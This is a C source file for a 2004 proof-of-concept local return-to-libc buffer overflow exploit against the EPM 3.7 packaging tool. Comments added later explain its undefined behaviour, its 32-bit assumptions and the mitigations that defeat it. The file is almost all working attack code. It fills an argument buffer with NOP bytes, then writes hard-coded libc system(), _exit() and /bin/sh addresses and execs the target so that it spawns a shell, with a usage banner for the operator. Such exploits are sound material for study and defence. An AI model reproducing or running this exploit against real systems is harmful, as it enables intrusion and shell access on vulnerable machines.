/*
 * EPM Buffer Overflow (retlibc exploit)
* _____ _
* | ___| | _____ ___
* | |_ | |/ _ \ \ /\ / /
* | _| | | (_) \ V V /
* |_| |_|\___/ \_/\_/
* Security Group.
*
* Description: flow-epm.c (www.flowsecurity.org);
*
* Proof of Concept local RetLibc exploit for EPM - 3.7 (not suid by default).
*
* It has been successfully tested on:
*
* Suse Linux 9.0
* Greets:
*
* Luiz Fernando Camargo
* Jefferson Cechinel
* Gerrit
* fAil
* newbug
*
* Date: 29'Sep 2004
*
*
* Author:
* Thyago Silva - setnf@flowsecurity.org
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <dlfcn.h>
#define PNAME "./epm" // program name
#define NOP 0x90 // No Operation
/* You need change the addr's */
#define SYSTEM 0x4006d4b0 // system() address in libc
#define EXIT 0x400d8088 // _exit() address in libc
#define SHELL 0x40151439 // /bin/sh address in libc
/*
 * Entry point.  Expects exactly two arguments: argv[1] is the path of the
 * program to execute, argv[2] an integer offset parsed with atoi() (so a
 * non-numeric value silently becomes 0).  The three libc addresses used
 * below are hard-coded build-specific constants (see the #defines above);
 * they only match one particular libc image, and any address-randomised,
 * non-executable-stack or stack-protected build of the target will not
 * behave as this code assumes.
 */
int main(int argc, char *argv[])
{
/* Reject anything other than exactly two user arguments. */
if(argc < 3 || argc > 3) {
fprintf(stderr, "############## Flow Security ##############\n");
fprintf(stderr, "# RetLibc Exploit for EPM - 3.7 #\n");
fprintf(stderr, "# setnf@flowsecurity.org #\n");
fprintf(stderr, "###########################################\n\n");
fprintf(stderr, "[!] Usage: %s <path> <offset>\n\n", argv[0]);
exit(0); }
/*
 * 256 bytes of filler, 4 more bytes, three 4-byte words and one extra
 * byte.  The arithmetic assumes a 32-bit target where sizeof(int) == 4;
 * the int-pointer writes below would not line up with native pointers
 * on a 64-bit build.
 */
int TBUFF = ((256 + 4) + (4 * 3) + 1); /* total buffer */
/*
 * Index into buf measured in ints (not bytes) at which the three words
 * are written; argv[2] shifts it.  It is not range-checked: a large or
 * negative offset makes the writes below land outside buf, which is
 * undefined behaviour in this program itself.
 */
int NBUFF = ((256 / 4) + atoi(argv[2])); /* NOP buffer with offset */
fprintf(stderr, "[*] Program name : [%s]\n", argv[1]);
fprintf(stderr, "[*] Offset : [%d]\n", atoi(argv[2]));
/* Variable-length array (C99); its size depends on TBUFF above. */
char buf[TBUFF];
/* buf is reinterpreted as an int array so that 4-byte words can be
 * stored into it; this relies on the int/char aliasing and the target's
 * pointer width, see the TBUFF note above. */
int *p = (int *)buf;
/* NOTE(review): %p expects a void *, but these macros are plain integer
 * constants, so the format/argument types do not match (undefined
 * behaviour in C); a (void *) cast would be needed for a correct call. */
fprintf(stderr, "[*] system() address : [%p]\n", SYSTEM);
fprintf(stderr, "[*] _exit() address : [%p]\n", EXIT);
fprintf(stderr, "[*] /bin/sh address : [%p]\n", SHELL);
/* Fill the whole buffer (all TBUFF bytes) with the NOP byte; this leaves
 * no NUL terminator, so the string passed to execl() ends only where the
 * zero word written below happens to land. */
memset(buf, NOP, TBUFF);
/* Advance NBUFF ints into the buffer (see the range note on NBUFF). */
p += NBUFF;
/* Store three 4-byte words followed by a zero word; the zero word also
 * acts as the string terminator for the argument when it lies inside buf. */
*p++ = SYSTEM;
*p++ = EXIT;
*p++ = SHELL;
*p = 0x0;
/*
 * Replace this process with argv[1], passing buf as its single command-line
 * argument.  argv[1] + 2 is handed over as the new argv[0], i.e. the first
 * two characters of the supplied path are dropped (presumably a leading
 * "./"; the code does not check that the path is that long).  Portable
 * code would pass the sentinel as (char *)NULL, since execl() is variadic.
 * From a defensive standpoint this is an argument-driven overflow: the
 * target's exposure is limited by argument-length validation in the
 * program and by the platform mitigations mentioned at the top.
 */
execl(argv[1], argv[1] + 2, buf, NULL);
/* Only reached if execl() itself fails; main then returns 0 implicitly
 * (C99), so the failure is reported on stderr but not via exit status. */
perror("\n[!]");
}